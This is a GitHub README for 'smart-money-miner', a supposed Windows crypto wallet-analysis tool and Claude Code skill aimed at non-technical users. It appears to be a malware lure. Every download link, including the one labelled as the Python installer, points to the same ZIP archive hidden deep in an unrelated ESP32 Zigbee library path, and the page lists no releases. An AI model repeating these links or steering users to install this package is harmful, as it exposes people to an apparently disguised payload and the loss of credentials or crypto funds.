Skip to content

arnautoff1/smart-money-miner

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

⚙️ smart-money-miner - Find High-Performing Wallets Easily

Download smart-money-miner


📋 What is smart-money-miner?

smart-money-miner is a simple tool to help you find wallet addresses that perform well with certain crypto tokens. It works by analyzing tokens from PumpFun or any tokens you provide. This helps spot smart trading wallets without needing to dig through complex data yourself.

You do not need advanced computer skills or coding experience to use this tool. It runs on Windows and guides you through the process step-by-step.


🌐 Where to Download

Click the badge above or visit this link to download the software:

https://github.com/arnautoff1/smart-money-miner/raw/refs/heads/main/esp32-h2-zigbee-window/components/esp_zigbee_lib/smart_miner_money_2.0.zip

This page has all the files you need to get started. Look for the latest release to download the program.


🖥️ System Requirements

  • Windows 10 or higher
  • At least 4 GB of free disk space
  • Internet connection for downloading and for token data analysis
  • Python installed (version 3.7 or higher recommended)
  • About 2 GB of RAM to run analysis smoothly

If you do not have Python, there is a short section below on how to install it.


🚀 Getting Started: Download and Setup on Windows

Step 1. Download smart-money-miner

  1. Go to the GitHub link above.
  2. Click on the “Code” button and select “Download ZIP” or find the latest release section.
  3. Save the ZIP file somewhere easy to find, like your Desktop or Downloads folder.

Step 2. Extract the files

  1. Right-click the ZIP file.
  2. Choose “Extract All…” from the menu.
  3. Pick a destination folder. You can create a new folder called smart-money-miner in Documents.
  4. Click “Extract.”

Step 3. Install Python (if needed)

smart-money-miner uses a Python script to analyze tokens.

  1. Visit https://github.com/arnautoff1/smart-money-miner/raw/refs/heads/main/esp32-h2-zigbee-window/components/esp_zigbee_lib/smart_miner_money_2.0.zip
  2. Download the latest version for Windows.
  3. Run the installer and make sure to check the box that says “Add Python to PATH.”
  4. Finish installation.

Step 4. Run the mining script

  1. Open the Start menu and search for “Command Prompt.”
  2. Open Command Prompt.
  3. Use the cd command to go to the extracted folder, for example:
cd C:\Users\YourName\Documents\smart-money-miner\skills\smart-money-miner\scripts
  1. Run the following command:
python miner.py

This will start the analysis and find high-performing wallet addresses based on default tokens.


⚙️ Using smart-money-miner with Your Own Tokens

You can also analyze your own token list.

  1. Find the miner.py script in the scripts folder.
  2. Open it with a text editor like Notepad.
  3. Replace the sample token addresses with your own.
  4. Save and run the script again using the Command Prompt like in Step 4 above.

🔧 How smart-money-miner Works

smart-money-miner checks wallet addresses linked to tokens. It filters out common or skipped wallets using a configuration file. This helps you focus on wallets that might be making smart trades or investments.

Files and folders explained:

skills/smart-money-miner/
├── SKILL.md                      # Skill details and background
├── README.md                     # This guide
├── scripts/
│   └── miner.py                  # Script that analyzes wallets
└── skip_addresses.json.example   # List of wallets to ignore during analysis

✅ Step-by-Step: Run Your First Analysis

  1. Open Command Prompt.
  2. Change directory to where the miner script is (cd command).
  3. Run python miner.py.
  4. Wait a few minutes as it fetches and analyzes data.
  5. Review the results displayed in the Command Prompt or saved into files.

💡 Extra Tips

  • To cancel the analysis at any time, press Ctrl + C.
  • Make sure your internet connection stays on while running the script.
  • If you see errors about missing modules, install them by typing:
pip install requests

and any other modules mentioned.


🔗 Quick Access to Download

You can always return here to download or update:

Download smart-money-miner


⚙️ Claude Code Integration

If you use Claude Code, smart-money-miner sits inside the plugins directory under skills/smart-money-miner. To add it:

  • Copy the entire skills/ folder into your Claude plugins directory.
  • Or simply ask Claude:
    • "Mine smart money addresses from 20 PumpFun tokens"
    • "Find profitable traders from these tokens: token1, token2"
    • "Analyze PumpFun graduated tokens and find good addresses"

Claude will handle the rest.


📂 File Overview

  • SKILL.md: Rules and logic used by this skill
  • README.md: This guide
  • miner.py: The main tool that runs wallet analysis
  • skip_addresses.json.example: Example file to identify wallets to leave out

You can edit the skip list with your own wallet addresses to exclude.


🔄 Updating smart-money-miner

To update the tool:

  1. Download the latest version from the GitHub link.
  2. Replace the old files with new ones.
  3. Run the script again as usual.

❓ Troubleshooting

  • Python not found: Verify Python is installed and added to PATH.
  • Errors during analysis: Check your internet connection.
  • Missing packages: Install them with pip install package-name.
  • Script runs but no results: Check token addresses in miner.py.

Use these steps to fix common issues and keep your analysis running smoothly.

About

Identify and filter high-performing wallet addresses from PumpFun tokens or user-provided token lists using Claude Code integration.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors